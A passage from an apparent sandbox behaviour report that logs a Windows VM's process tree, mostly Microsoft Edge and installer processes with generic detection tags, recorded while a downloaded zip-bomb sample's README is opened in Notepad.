XBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMTM5MjQyNzIzMiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijk1MSIgZG93bmxvYWRlZD0iMTc2NjIyMTYwIiB0b3RhbD0iMTc2NjIyMTYwIiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMiIgaW5zdGFsbF90aW1lX21zPSI1OTc0NiIvPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9Ii0xIiBhZD0iLTEiIHJkPSItMSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMzEuMC4yOTAzLjcwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2NTQ1IiBjb2hvcnQ9InJyZkAwLjM2IiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzNzc3OTQ3ODEyNTYwNTkwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9Ii0xIiBhZD0iLTEiIHJkPSItMSIgcGluZ19mcmVzaG5lc3M9Ins5ODNDQkI4QS1COTBCLTQ2QjItQjYyMS02RTNBODQ1NEExRjB9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4108
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:8500
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\zipbomb-20210121\zipbomb-20210121\README.txt1⤵PID:8444
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\elevation_service.exe"1⤵PID:3016
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --rename-msedge-exe --system-level --verbose-logging --msedge --channel=stable2⤵
- Modifies registry class
PID:5164 -
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff69ca32918,0x7ff69ca32924,0x7ff69ca329303⤵PID:8876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --msedge --channel=stable --delete-old-versions --system-level --verbose-logging3⤵
- Modifies data under HKEY_USERS
PID:5436 -
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff69ca32918,0x7ff69ca32924,0x7ff69ca329304⤵PID:4992
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level3⤵PID:8672
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ff69ca32918,0x7ff69ca32924,0x7ff69ca329304⤵PID:8292
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Checks system information in the registry
- Drops file in Program Files directory
- Enumerates system info in registry
- NTFS ADS
- System policy modification
PID:6008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2dc,0x2f0,0x7ff8b8a06070,0x7ff8b8a0607c,0x7ff8b8a060882⤵
- Checks computer location settings
- Checks system information in the registry
- Checks processor information in registry
- Enumerates system info in registry
PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2512,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=2508 /prefetch:22⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1892,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=2772 /prefetch:32⤵PID:7492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2536,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=2776 /prefetch:82⤵PID:8716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3468,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:12⤵
- Checks computer location settings
PID:4336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3476,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:12⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=4236,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:32⤵PID:4800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=4256,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:82⤵PID:8436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2672,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:22⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4668,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=4716 /prefetch:22⤵
- Checks computer location settings
PID:7744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5256,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:82⤵PID:3096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5540,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:82⤵PID:6500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5500,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:82⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=2776,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:82⤵PID:8568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6304,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:12⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5532,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6588 /prefetch:12⤵
- Checks computer location settings
PID:5876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5748,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6748 /prefetch:12⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5608,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:82⤵PID:8196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5608,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:82⤵PID:8744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5652,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:82⤵PID:8632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6980,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:82⤵PID:8576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7076,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7204 /prefetch:82⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7192,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:82⤵PID:3136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7060,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:82⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6408,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:82⤵PID:372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5576,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6424 /prefetch:82⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6468,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:82⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7340,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:82⤵PID:7572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7360,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7200 /prefetch:82⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7364,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6648 /prefetch:82⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=4756,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=4960 /prefetch:82⤵PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7660,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7160 /prefetch:12⤵
- Checks computer location settings
PID:8688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=3844,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7700 /prefetch:12⤵
- Checks computer location settings
PID:7736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6160,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:12⤵
- Checks computer location settings
PID:8792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7272,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7296 /prefetch:12⤵
- Checks computer location settings
PID:7228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6676,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:12⤵
- Checks computer location settings
PID:7444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7500,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7912 /prefetch:12⤵
- Checks computer location settings
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6460,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:12⤵PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=5488,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7036 /prefetch:12⤵
- Checks computer location settings
PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=7212,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6340 /prefetch:12⤵
- Checks computer location settings
PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6660,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:12⤵
- Checks computer location settings
PID:516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=5200,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7780 /prefetch:12⤵
- Checks computer location settings
PID:8392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7480,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8000 /prefetch:12⤵PID:8024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7904,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:82⤵PID:8708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5852,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:82⤵PID:7212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7760,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7000 /prefetch:82⤵PID:7420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7872,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7916 /prefetch:82⤵PID:8220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6120,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7452 /prefetch:82⤵PID:7800
-
-
